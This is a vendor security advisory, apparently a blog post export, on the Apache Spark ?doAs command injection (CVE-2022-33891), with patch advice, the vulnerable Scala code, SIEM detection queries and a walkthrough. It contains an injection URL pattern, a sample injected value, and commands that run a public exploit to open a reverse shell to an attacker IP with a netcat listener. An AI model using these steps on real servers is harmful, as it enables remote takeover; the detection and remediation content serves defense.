{"id":65428,"date":"2023-03-28T11:24:31","date_gmt":"2023-03-28T03:24:31","guid":{"rendered":"https:\/\/version-2.com.sg\/?p=65428"},"modified":"2024-09-13T16:31:23","modified_gmt":"2024-09-13T08:31:23","slug":"apache-zero-days-apache-spark-command-injection-vulnerability-cve-2022-33891","status":"publish","type":"post","link":"https:\/\/version-2.com\/zh\/2023\/03\/apache-zero-days-apache-spark-command-injection-vulnerability-cve-2022-33891\/","title":{"rendered":"Apache Zero Days – Apache Spark Command Injection Vulnerability (CVE-2022-33891)"},"content":{"rendered":"\t\t
\n\t\t\t\t\t\t
\n\t\t\t\t\t\t
\n\t\t\t\t\t
\n\t\t\t
\n\t\t\t\t\t\t
\n\t\t\t\t
\n\t\t\t\t\t\t\t\t\t

<\/p>

Component Name:<\/strong><\/h2>

Apache Spark<\/p>

Affected Versions:<\/strong><\/h2>

Apache Spark \u22643.0.3<\/p>

3.1.1\u2264 Apache Spark \u22643.1.2<\/p>

3.2.0\u2264 Apache Spark \u22643.2.1<\/p>

Vulnerability Type:<\/strong><\/h2>

Command Injection<\/p>

CVSSv3:<\/strong><\/h2>

Base Score: \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a08.8 (High)<\/p>

Attack Vector: \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0Network<\/p>

Attack Complexity: \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0Low<\/p>

Privileges Required: \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0None<\/p>

User Interaction: \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0None<\/p>

Confidentiality Impact: \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0High<\/p>

Integrity Impact: \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0High<\/p>

Availability Impact: \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0High<\/p>

Remediation Solutions:<\/strong><\/h2>

Check the Component Version:<\/strong><\/h4>

Run spark-shell<\/strong> command. The version information will be displayed.<\/p>

<\/p>

\u00a0<\/p>

Apache Solution<\/strong><\/h4>

Users can update their affected products to the latest version to fix the vulnerability:<\/p>

https:\/\/spark.apache.org\/downloads.html<\/a><\/p>

How does it work?<\/strong><\/h2>

The command injection occurs because Spark checks the group membership of the user passed in the ?doAs<\/em><\/strong> parameter by using a raw Linux command.<\/p>

User commands are processed through ?doAs<\/em><\/strong> parameter and nothing reflected back on the page during command execution, so this is blind OS injection. Your commands run, but there will be no indication if they worked or not or even if the program you\u2019re running is on target.<\/p>

OS commands that are passed on the URL parameters?doAs<\/em><\/strong> will trigger the background Linux bash process which calls cmdseq<\/em><\/strong> will run the process with the command line id -Gn<\/em><\/strong> .Running of bash with id -Gn is a<\/em><\/strong> good sign of indicator that your server is vulnerable or it is already compromised.<\/p>

If an attacker is sending reverse shell commands. There is also a high chance of granting apache spark server access to the attackers\u2019 machine.<\/p>

private def getUnixGroups(username: String): Set[String] = {\nval cmdSeq = Seq(\"bash\", \"-c\", \"id -Gn \" + username)\n\/\/ we need to get rid of the trailing \"\\n\" from the result of command execution\nUtils.executeAndGetOutput(cmdSeq).stripLineEnd.split(\" \").toSet\nUtils.executeAndGetOutput(idPath :: \"-Gn\" :: username :: Nil).stripLineEnd.split(\" \").toSet\n}}<\/code><\/pre>
Vulnerable source code: https:\/\/github.com\/apache\/spark\/pull\/36315\/files#diff-96652ee6dcef30babdeff0aed66ced6839364ea4b22b7b5fdbedc82eb655eeb5L41<\/a><\/p>
<\/p>
\u00a0<\/p>
The command injection occurs because Spark checks the group membership of the user passed in the ?doAs<\/strong> parameter by using a raw Linux command.<\/p>
Vulnerable component<\/h2>
http:\/\/<IP_address>\/?doAs=`[command injection here]`<\/code><\/p>
User commands are processed through ?doAs<\/strong> parameter and nothing reflected back on the page during command execution, so this is blind OS injection. Your commands run, but there will be no indication if they worked or not or even if the program you\u2019re running is on target.<\/p>
Vulnerable Method:<\/h2>
private def getUnixGroups(username: String): Set[String] = {\n    val cmdSeq = Seq(\"bash\", \"-c\", \"id -Gn \" + username)\n    \/\/ we need to get rid of the trailing \"\\n\" from the result of command execution\n    Utils.executeAndGetOutput(cmdSeq).stripLineEnd.split(\" \").toSet\n    Utils.executeAndGetOutput(idPath ::  \"-Gn\" :: username :: Nil).stripLineEnd.split(\" \").toSet\n  }\n}<\/code><\/pre>
This is a method definition in Scala for a private method named getUnixGroups<\/strong>. This method takes a single String<\/strong> argument called username<\/strong> and returns a Set<\/strong> of Strings<\/strong> that represent the groups that the user belongs to on a Unix-like system.<\/strong><\/p>
\u00a0<\/p>
The method first constructs a Seq<\/strong> of Strings<\/strong> that represents a shell command to retrieve the user’s group information using the id<\/strong> command. The cmdSeq<\/strong> variable is set to this sequence, with the username<\/strong> parameter concatenated to the end of the command using string concatenation.<\/p>
\u00a0<\/p>
Next, the executeAndGetOutput<\/strong> method of the Utils<\/strong> object is called with cmdSeq as its argument. This method executes the shell command represented by the cmdSeq<\/strong> sequence and returns the output of the command as a string.<\/p>
\u00a0<\/p>
The output of the executeAndGetOutput<\/strong> method is then processed to remove the trailing newline character using the stripLineEnd<\/strong> method. The resulting string is then split into an array of strings using the split<\/strong> method<\/strong> and converted into a Set<\/strong> using the toSet<\/strong> method. This Set<\/strong> of strings represents the user’s group membership.<\/p>
\u00a0<\/p>
\u00a0\u00a0\u00a0 val cmdSeq = Seq(\"bash\", \"-c\", \"id -Gn \" + username)<\/code><\/p>
\u00a0<\/p>
The getUnixGroups<\/strong> method constructs a shell command<\/strong> by concatenating the username<\/strong> parameter with the id<\/strong> command. The username parameter is not properly sanitized or validated<\/strong>, which means that an attacker could potentially inject malicious code into it and execute arbitrary commands on the underlying operating system.<\/p>
\u00a0<\/p>
For example, if an attacker were to supply a username parameter of “; echo hacked > \/tmp\/hacked”<\/strong>, the resulting shell command would be “id -Gn ; echo hacked > \/tmp\/hacked”.<\/strong> When this command is executed by the executeAndGetOutput<\/strong> method, it would execute the id command and then execute the echo command, which writes the string “hacked”<\/strong> to the file \/tmp\/hacked.<\/strong> This would give the attacker arbitrary code execution on the underlying operating system.<\/p>
In current scenario we can see that OS commands that are passed on the URL parameters ?doAs will trigger the background Linux bash process which calls cmdseq<\/strong> will run the process with the command line id -Gn. Running of bash with id -Gn<\/strong> is a good sign of indicator that your server is vulnerable or it is already compromised.<\/p>
If an attacker is sending reverse shell commands. There is also a high chance of granting Apache spark server access to the attackers\u2019 machine.<\/p>
Detection & Response:<\/strong><\/h2>
This can allow the attacker to reach a permission check function that builds a Unix shell command based on their input, which is then executed by the system. This can result in arbitrary shell command execution with the privileges of the Spark process, potentially leading to complete compromise of the affected system.<\/p>
The Apache Spark command injection vulnerability (CVE-2022-33891) is a serious security issue that can allow an attacker to execute arbitrary code with the privileges of the Spark process, potentially leading to complete compromise of the affected system. It is important for organizations using Apache Spark to be aware of this vulnerability and take steps to detect and respond to it.<\/p>
One way to detect the vulnerability is to monitor for suspicious activity on the affected system. This can include monitoring for unexpected system or network behavior, such as unusual network traffic or system resource usage. It can also include monitoring for malicious activity, such as attempts to execute unauthorized code or access restricted resources.<\/p>
Another way to detect the vulnerability is to use security tools and technologies, such as intrusion detection systems (IDS) and vulnerability scanners, to identify potential vulnerabilities and security issues on the system. These tools can help to identify and alert on potential security threats, allowing organizations to take appropriate action to mitigate the risk.<\/p>
Once the vulnerability has been detected, it is important to take swift action to respond to the issue. This may include isolating the affected system to prevent further compromise, implementing temporary fixes or workarounds, and deploying a patch or update to address the issue. It is also important to conduct a thorough investigation to determine the root cause of the vulnerability and implement measures to prevent similar issues from occurring in the future.<\/p>
Splunk:<\/strong><\/p>
index=* c-uri=\"*?doAs=`*\"\nindex=* (Image=\"*\\\\bash\" AND (CommandLine=\"*id -Gn*\"))<\/code><\/pre>
Qradar:<\/strong><\/p>
SELECT UTF8(payload) from events where LOGSOURCENAME(logsourceid) ilike '%Linux%' and \"Image\" ilike '%\\bash' and (\"Process CommandLine\" ilike '%id -Gn%')\n\nSELECT UTF8(payload) from events where \"URL\" ilike '%?doAs=`%'<\/code><\/pre>
Elastic Query:<\/strong><\/p>
url.original:*?doAs\\=`*\n(process.executable:*\\\\bash AND process.command_line:*id\\ \\-Gn*)<\/code><\/pre>
Carbon Black:<\/strong><\/p>
(process_name:*\\\\bash AND process_cmdline:*id\\ \\-Gn*)<\/code><\/pre>
FireEye:<\/strong><\/p>
(process:`*\\bash` args:`id -Gn`)<\/code><\/pre>
GrayLog:<\/strong><\/p>
(Image.keyword:*\\\\bash AND CommandLine.keyword:*id\\ \\-Gn*)\nc-uri.keyword:*?doAs=`*<\/code><\/pre>
RSA Netwitness:<\/strong><\/p>
(web.page contains '?doAs=`')\n((Image contains 'bash') && (CommandLine contains 'id -Gn'))<\/code><\/pre>
Logpoint:<\/strong><\/p>
(Image=\"*\\\\bash\" CommandLine IN \"*id -Gn*\")\nc-uri=\"*?doAs=`*\"<\/code><\/pre>
\u00a0<\/p>
Technical Detail:<\/strong><\/h2>
  1. First you need to clone exploit python script from github repository into your local machine using below command.<\/p><\/li><\/ol>
    \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ```\ngit clone https:\/\/github.com\/devengpk\/Apache-zero-days.git\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ```<\/code><\/pre>
    1. Apache Spark server is ready to test if this self hosted server is vulnerable or not<\/p>
      <\/p><\/li>
    2. Now, let\u2019s check if this target is vulnerable or not using below mentioned command<\/p><\/li><\/ol>
      ```\npython3 exploit.py -u http:\/\/<server-ip> -p 8080 --check --verbose\n```<\/code><\/pre>
      <\/p>
      1. From the above commands result, we found that the searched target is vulnerable.<\/p><\/li><\/ol>
        Now let\u2019s use our exploit to get the reverse shell by using the below command.<\/p>
        ```\npython3 exploit.py -u http:\/\/<Server-IP> -p 8080 --revshell -lh <Attacker-IP> -lp 9001 --verbose\n```<\/code><\/pre>
        <\/p>
        1. Before starting the reverse shell, let\u2019s start netcat <\/em><\/strong>listener to capture traffic for reverse shell using below mentioned command.<\/p><\/li><\/ol>
          ```\nnc -nvlp 9001\n```<\/code><\/pre>
          <\/p>
          1. After executing netcat command, execute the above mentioned reverse shell command and you will successfully got reverse shell and can execute all your desired commands on the target server.<\/p>
            <\/p><\/li><\/ol>
            Reference:<\/strong><\/h2>
            \u25cf\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Exploitation payload: https:\/\/github.com\/devengpk\/Apache-zero-days<\/a><\/h5>
            \u25cf\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Vulnerable source code: https:\/\/github.com\/apache\/spark\/pull\/36315\/files#diff-96652ee6dcef30babdeff0aed66ced6839364ea4b22b7b5fdbedc82eb655eeb5L41<\/a>


            #Apache #Apache_Spark #CVE-2022-33891<\/strong><\/h5><\/div>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t
            \n\t\t\t\t
            \n\t\t\t\t\t\t\t
            \t\t
            \n\t\t\t\t\t\t
            \n\t\t\t\t\t\t
            \n\t\t\t\t\t
            \n\t\t\t
            \n\t\t\t\t\t\t
            \n\t\t\t\t
            \n\t\t\t\t\t
            About Version 2 Digital<\/h3>
            Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.\n

            \nThrough an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.<\/p><\/div><\/div>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t\n\t\t
            \n\t\t\t\t\t\t
            \n\t\t\t\t\t\t
            \n\t\t\t\t\t
            \n\t\t\t
            \n\t\t\t\t\t\t
            \n\t\t\t\t
            \n\t\t\t\t\t\t\t\t\t
            <\/p>\n
            About VRX<\/b>
            VRX <\/b>is a consolidated vulnerability management platform that protects assets in real time. Its rich, integrated features efficiently pinpoint and remediate the largest risks to your cyber infrastructure. Resolve the most pressing threats with efficient automation features and precise contextual analysis.<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"
            Component Name: Apache Spark Affected Versions: Apache  […]<\/p>\n","protected":false},"author":148637484,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[476,1075,61],"tags":[477,1076],"class_list":["post-65428","post","type-post","status-publish","format-standard","hentry","category-vrx","category-year2023","category-press-release","tag-vrx","tag-1076"],"acf":[],"yoast_head":"\nApache Zero Days - Apache Spark Command Injection Vulnerability (CVE-2022-33891) - Version 2<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.vicarius.io\/blog\/apache-zero-days-apache-spark-command-injection-vulnerability-cve-2022-33891\" \/>\n<meta property=\"og:locale\" content=\"zh_HK\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Apache Zero Days - Apache Spark Command Injection Vulnerability (CVE-2022-33891) - Version 2\" \/>\n<meta property=\"og:description\" content=\"Component Name: Apache Spark Affected Versions: Apache […]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.vicarius.io\/blog\/apache-zero-days-apache-spark-command-injection-vulnerability-cve-2022-33891\" \/>\n<meta property=\"og:site_name\" content=\"Version 2\" \/>\n<meta property=\"article:published_time\" content=\"2023-03-28T03:24:31+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-09-13T08:31:23+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/clfj3jbjmewhu0kqjeks43wmd.png?tr=w-1800,c-at_max\" \/>\n<meta name=\"author\" content=\"versionpan\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u4f5c\u8005\" \/>\n\t<meta name=\"twitter:data1\" content=\"versionpan\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/apache-zero-days-apache-spark-command-injection-vulnerability-cve-2022-33891#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/2023\\\/03\\\/apache-zero-days-apache-spark-command-injection-vulnerability-cve-2022-33891\\\/\"},\"author\":{\"name\":\"versionpan\",\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#\\\/schema\\\/person\\\/103ffe36f7fd34a1cc126a30431b94d8\"},\"headline\":\"Apache Zero Days – Apache Spark Command Injection Vulnerability (CVE-2022-33891)\",\"datePublished\":\"2023-03-28T03:24:31+00:00\",\"dateModified\":\"2024-09-13T08:31:23+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/2023\\\/03\\\/apache-zero-days-apache-spark-command-injection-vulnerability-cve-2022-33891\\\/\"},\"wordCount\":1198,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/apache-zero-days-apache-spark-command-injection-vulnerability-cve-2022-33891#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/ik.imagekit.io\\\/14sfaswy6hrz\\\/blog-posts\\\/images\\\/clfj3jbjmewhu0kqjeks43wmd.png?tr=w-1800,c-at_max\",\"keywords\":[\"vRx\",\"2023\"],\"articleSection\":[\"vRx\",\"2023\",\"Press Release\"],\"inLanguage\":\"zh-HK\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/apache-zero-days-apache-spark-command-injection-vulnerability-cve-2022-33891#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/version-2.com\\\/2023\\\/03\\\/apache-zero-days-apache-spark-command-injection-vulnerability-cve-2022-33891\\\/\",\"url\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/apache-zero-days-apache-spark-command-injection-vulnerability-cve-2022-33891\",\"name\":\"Apache Zero Days - Apache Spark Command Injection Vulnerability (CVE-2022-33891) - Version 2\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/apache-zero-days-apache-spark-command-injection-vulnerability-cve-2022-33891#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/apache-zero-days-apache-spark-command-injection-vulnerability-cve-2022-33891#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/ik.imagekit.io\\\/14sfaswy6hrz\\\/blog-posts\\\/images\\\/clfj3jbjmewhu0kqjeks43wmd.png?tr=w-1800,c-at_max\",\"datePublished\":\"2023-03-28T03:24:31+00:00\",\"dateModified\":\"2024-09-13T08:31:23+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/apache-zero-days-apache-spark-command-injection-vulnerability-cve-2022-33891#breadcrumb\"},\"inLanguage\":\"zh-HK\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/apache-zero-days-apache-spark-command-injection-vulnerability-cve-2022-33891\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"zh-HK\",\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/apache-zero-days-apache-spark-command-injection-vulnerability-cve-2022-33891#primaryimage\",\"url\":\"https:\\\/\\\/ik.imagekit.io\\\/14sfaswy6hrz\\\/blog-posts\\\/images\\\/clfj3jbjmewhu0kqjeks43wmd.png?tr=w-1800,c-at_max\",\"contentUrl\":\"https:\\\/\\\/ik.imagekit.io\\\/14sfaswy6hrz\\\/blog-posts\\\/images\\\/clfj3jbjmewhu0kqjeks43wmd.png?tr=w-1800,c-at_max\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/apache-zero-days-apache-spark-command-injection-vulnerability-cve-2022-33891#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"\u9996\u9801\",\"item\":\"https:\\\/\\\/version-2.com\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Apache Zero Days – Apache Spark Command Injection Vulnerability (CVE-2022-33891)\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#website\",\"url\":\"https:\\\/\\\/version-2.com\\\/zh\\\/\",\"name\":\"Version 2\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/version-2.com\\\/zh\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"zh-HK\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#organization\",\"name\":\"Version 2\",\"url\":\"https:\\\/\\\/version-2.com\\\/zh\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"zh-HK\",\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/i0.wp.com\\\/version-2.com\\\/wp-content\\\/uploads\\\/2020\\\/08\\\/v2-hk-hor-4.png?fit=1795%2C335&ssl=1\",\"contentUrl\":\"https:\\\/\\\/i0.wp.com\\\/version-2.com\\\/wp-content\\\/uploads\\\/2020\\\/08\\\/v2-hk-hor-4.png?fit=1795%2C335&ssl=1\",\"width\":1795,\"height\":335,\"caption\":\"Version 2\"},\"image\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#\\\/schema\\\/person\\\/103ffe36f7fd34a1cc126a30431b94d8\",\"name\":\"versionpan\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"zh-HK\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/72541e15024f6716236decb252e7488d4a7359d4df6f8506b01f447174f92c7c?s=96&d=identicon&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/72541e15024f6716236decb252e7488d4a7359d4df6f8506b01f447174f92c7c?s=96&d=identicon&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/72541e15024f6716236decb252e7488d4a7359d4df6f8506b01f447174f92c7c?s=96&d=identicon&r=g\",\"caption\":\"versionpan\"},\"url\":\"https:\\\/\\\/version-2.com\\\/zh\\\/author\\\/versionpan\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Apache Zero Days - Apache Spark Command Injection Vulnerability (CVE-2022-33891) - Version 2","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.vicarius.io\/blog\/apache-zero-days-apache-spark-command-injection-vulnerability-cve-2022-33891","og_locale":"zh_HK","og_type":"article","og_title":"Apache Zero Days - Apache Spark Command Injection Vulnerability (CVE-2022-33891) - Version 2","og_description":"Component Name: Apache Spark Affected Versions: Apache […]","og_url":"https:\/\/www.vicarius.io\/blog\/apache-zero-days-apache-spark-command-injection-vulnerability-cve-2022-33891","og_site_name":"Version 2","article_published_time":"2023-03-28T03:24:31+00:00","article_modified_time":"2024-09-13T08:31:23+00:00","og_image":[{"url":"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/clfj3jbjmewhu0kqjeks43wmd.png?tr=w-1800,c-at_max","type":"","width":"","height":""}],"author":"versionpan","twitter_card":"summary_large_image","twitter_misc":{"\u4f5c\u8005":"versionpan"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.vicarius.io\/blog\/apache-zero-days-apache-spark-command-injection-vulnerability-cve-2022-33891#article","isPartOf":{"@id":"https:\/\/version-2.com\/2023\/03\/apache-zero-days-apache-spark-command-injection-vulnerability-cve-2022-33891\/"},"author":{"name":"versionpan","@id":"https:\/\/version-2.com\/zh\/#\/schema\/person\/103ffe36f7fd34a1cc126a30431b94d8"},"headline":"Apache Zero Days – Apache Spark Command Injection Vulnerability (CVE-2022-33891)","datePublished":"2023-03-28T03:24:31+00:00","dateModified":"2024-09-13T08:31:23+00:00","mainEntityOfPage":{"@id":"https:\/\/version-2.com\/2023\/03\/apache-zero-days-apache-spark-command-injection-vulnerability-cve-2022-33891\/"},"wordCount":1198,"commentCount":0,"publisher":{"@id":"https:\/\/version-2.com\/zh\/#organization"},"image":{"@id":"https:\/\/www.vicarius.io\/blog\/apache-zero-days-apache-spark-command-injection-vulnerability-cve-2022-33891#primaryimage"},"thumbnailUrl":"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/clfj3jbjmewhu0kqjeks43wmd.png?tr=w-1800,c-at_max","keywords":["vRx","2023"],"articleSection":["vRx","2023","Press Release"],"inLanguage":"zh-HK","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/www.vicarius.io\/blog\/apache-zero-days-apache-spark-command-injection-vulnerability-cve-2022-33891#respond"]}]},{"@type":"WebPage","@id":"https:\/\/version-2.com\/2023\/03\/apache-zero-days-apache-spark-command-injection-vulnerability-cve-2022-33891\/","url":"https:\/\/www.vicarius.io\/blog\/apache-zero-days-apache-spark-command-injection-vulnerability-cve-2022-33891","name":"Apache Zero Days - Apache Spark Command Injection Vulnerability (CVE-2022-33891) - Version 2","isPartOf":{"@id":"https:\/\/version-2.com\/zh\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.vicarius.io\/blog\/apache-zero-days-apache-spark-command-injection-vulnerability-cve-2022-33891#primaryimage"},"image":{"@id":"https:\/\/www.vicarius.io\/blog\/apache-zero-days-apache-spark-command-injection-vulnerability-cve-2022-33891#primaryimage"},"thumbnailUrl":"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/clfj3jbjmewhu0kqjeks43wmd.png?tr=w-1800,c-at_max","datePublished":"2023-03-28T03:24:31+00:00","dateModified":"2024-09-13T08:31:23+00:00","breadcrumb":{"@id":"https:\/\/www.vicarius.io\/blog\/apache-zero-days-apache-spark-command-injection-vulnerability-cve-2022-33891#breadcrumb"},"inLanguage":"zh-HK","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.vicarius.io\/blog\/apache-zero-days-apache-spark-command-injection-vulnerability-cve-2022-33891"]}]},{"@type":"ImageObject","inLanguage":"zh-HK","@id":"https:\/\/www.vicarius.io\/blog\/apache-zero-days-apache-spark-command-injection-vulnerability-cve-2022-33891#primaryimage","url":"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/clfj3jbjmewhu0kqjeks43wmd.png?tr=w-1800,c-at_max","contentUrl":"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/clfj3jbjmewhu0kqjeks43wmd.png?tr=w-1800,c-at_max"},{"@type":"BreadcrumbList","@id":"https:\/\/www.vicarius.io\/blog\/apache-zero-days-apache-spark-command-injection-vulnerability-cve-2022-33891#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"\u9996\u9801","item":"https:\/\/version-2.com\/"},{"@type":"ListItem","position":2,"name":"Apache Zero Days – Apache Spark Command Injection Vulnerability (CVE-2022-33891)"}]},{"@type":"WebSite","@id":"https:\/\/version-2.com\/zh\/#website","url":"https:\/\/version-2.com\/zh\/","name":"Version 2","description":"","publisher":{"@id":"https:\/\/version-2.com\/zh\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/version-2.com\/zh\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"zh-HK"},{"@type":"Organization","@id":"https:\/\/version-2.com\/zh\/#organization","name":"Version 